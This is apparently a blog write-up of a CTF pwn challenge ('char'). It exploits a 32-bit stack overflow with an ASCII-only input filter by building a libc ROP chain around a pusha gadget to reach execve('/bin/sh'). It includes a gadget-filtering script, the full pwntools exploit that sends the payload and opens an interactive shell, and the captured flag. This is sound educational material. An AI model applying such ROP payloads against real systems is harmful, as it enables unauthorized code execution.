---
layout: post
title: 0Ctf - Char Writeup
description: "Writeup for the 2016 boston key party reversing 5 exercise, the frog fractions 2"
modified: 2016-03-15
tags: [writeup, ctf, pwn, rop]
comments: true
share: true
categories: [writeups]
---

This has been a fairly straightforward challenge. We are given a binary that has a textbook buffer overflow with no canaries and NX enabled. The only twist in the story is that the input is filtered in a way that only ASCII characters are allowed. Each byte must be between 0x20 and 0x7f otherwise the program terminates. This means that the challenge boils down to crafting a ROP chain that only contains the "good" characters.

Lucky for us, the program mmaps the provided libc.so to the ASCII friendly 0x5555e000 address. This map is going to serve our only source of ROP gadgets as the program binary itself loaded on a bad address. I began solving the problem by getting a list of the available libc calls that reside on good addresses. The `nm --dynamic libc.so` command can be used to list exported symbols and I quickly put together a little python script to filter the results.

```python
#!/usr/bin/python2
import sys

with open('functions.list') as f:
    for line in f:
        try:
            address = int(line.split()[0], 16) + 0x5555e000
        except ValueError:
            continue
        test = address
        try:
            for i in range(4):
                lbyte = (test & 0xff)
                if lbyte <= 0x1f or lbyte >0x7e:
                    raise ValueError('shit happens')
                test = test>>8
        except ValueError:
            continue
        sys.stdout.write(hex(address)+'/'+line) #line.split(' ', 1)[1])

```
Unfortunately neither the `system` function nor the `/bin/sh` string was at a good address so I had to look for something else. It stuck to me that the `gets` function was available which could be used to overwrite my buffer with unfiltered data. This approach was a dead end and I briefly explain why. `gets` requires a single parameter a pointer to read to, which ,since this challenge was written on i386, is passed on the stack. I ideally wanted to overwrite the stack buffer so I had to push the `esp` onto the stack, which seemed fairly easy to do. I quickly put together the ROP chain and then I realised that none of the libc variables are initialized. This is *obviously* not the real libc, just an mmaped binary blob, which means that libc init was never called and all the variables such as stdin pointer, env pointer are left as null. This of course breaks most of the libc function calls.

So I had to come up with a different approach relying only on system calls, or wrappers that do not use any of the aforementioned variables. My plan B became jumping to a `call execve` instruction with the correct parameters set up (I could not just jump to `execve` since it was on a bad address). The problem was that `execve` requires a pointer to the `/bins/sh` string, which is on a bad address, and two null pointers (for env and arg) which again cannot be directly supplied. So I had to set up these parameters in registers and push them on the stack in the right order then call execve.

I used `ROPgadget --all` to gather the gadgets and filtered the output the same way as I filtered the symbol list. I have spent some time looking through the gadgets to where and how I could set up the parameters and then I found a `pusha` gadget. `pusha` pushes all the general purpose registers onto the stack in the following order EAX, ECX, EDX, EBX, ESP, EBP, ESI, EDI. This was perfect for me all that was left to do:

* set EAX to 0 as it is going to be the env pointer
* set ECX to 0 as the arg pointer
* calculate the address of `/bin/sh` in EDX
* put the address of `call execve` in EBX
* set the address of the next gadget in EDI which is going to be executed after the `pusha`, this gadget should pop of 3 items from the stack (former ESP, EDI, ESI) so that the `call execve` gets executed

There were `pop edi` and `pop ebx` gadgets so setting those up was trivial, just as well as setting EAX to null with a `xor eax eax` gadget. ECX was set to null with and `xchg eax, ecx` gadget and EDX was calculated with an `add eax, 0xc35b0000` and `sub edx, eax` gadgets, setting EAX and EDX appropriately beforehand ( /bin/sh: 0x556bb7ec = 0x3a212121-(0xc35b0000+0x215a6935). The actual exploit code is really messy and I am too lazy to clean it up, so I am just gonna copy it here. I hope this explanation makes up for it. The ROP chain worked like a charm after spending considerable amount of time piecing it together, the flag was:

```
flag{Asc11_ea3y_d0_1t???}
``` 

```python
if __name__ == "__main__":
    c = remote(IP, PORT)

    binsh = 0x556bb7ec

#    * 0x556d2a51/0x00174a51 : pop ecx ; add al, 0xa ; ret
    popecx = 0x556d2a51
#    * hex((0x3a212121-(0xc35b0000+0x215a6935))&0xffffffff)
    edxval = 0x3a212121
    ecxval = 0x215a6935
#    * 0x555f3555/0x00095555 : pop edx ; xor eax, eax ; pop edi ; ret
    popedx = 0x555f3555 # 0 eax popedi
    filler = 'CCCC'
#    * 0x556a6253/0x00148253 : mov eax, ecx ; ret
    moveaxecx = 0x556a6253
#    * 0x5557734b/0x0001934b : add eax, 0xc35b0000 ; ret
    addieax = 0x5557734b
#    * 0x5560365c/0x000a565c : sub edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret
    subedxeax = 0x5560365c #pop esi,edi, ebp trash eax
    
	# Set up bin sh addr in edx
    payload = 'A'*32 +p32(popecx) + p32(ecxval) + p32(popedx) + p32(edxval) + filler + p32(moveaxecx)+p32(addieax) + p32(subedxeax) +filler*3
  

#    * 0x55617a5f/0x000b9a5f : xchg eax, ecx ; mov eax, 0xff ; jne 0xb9a41 ; ret
    xchgeaxecx = 0x55617a5f
#    * 0x555f6428/0x00098428 : xor eax, eax ; ret
    xoreax = 0x555f6428
    # Set null in ecx and eax
    payload += p32(xoreax) + p32(xchgeaxecx) + p32(xoreax)


#    * 0x555f2166/0x00094166 : pop ebx ; pop edi ; ret
    popebxedi = 0x555f2166
    callexecve = 0x55616967
    
	# Set up ebx and edi
	# the subedxeax gadget pops esi, edi, ebp so it is used to position the stack after the pusha
    payload += p32(popebxedi) + p32(callexecve) + p32(subedxeax)

#   * pushal; ret; -> returns edi
    pushal = 0x5563704c
    # pushall
    payload += p32(pushal)
 
    #print hexdump(payload)
    payload += 'B'*(2398-len(payload))
    #sys.stdout.write(payload)
    #sys.stdout.flush()
    c.sendline(payload)

    c.interactive()
```
